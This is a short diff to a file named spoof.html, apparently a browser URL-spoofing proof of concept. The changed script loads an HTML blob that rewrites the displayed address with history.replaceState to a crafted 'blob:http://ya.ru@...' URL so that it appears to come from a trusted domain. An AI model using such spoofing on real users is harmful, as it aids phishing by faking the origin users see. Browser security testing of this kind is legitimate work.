--- a/spoof.html
+++ b/spoof.html
@@ -18,7 +18,7 @@
     </script> -->
 
     <script>
-    var exp = 'Sergey (3) <script>history.replaceState("","","blob:http://foo-bar.html")<\/script>';
+    var exp = 'Sergey (4) <script>history.replaceState("","","blob:http://ya.ru@http://foo-bar.html")<\/script>';
     location=URL.createObjectURL(new Blob([exp], {type: "text/html"}))
     </script>
 </body>
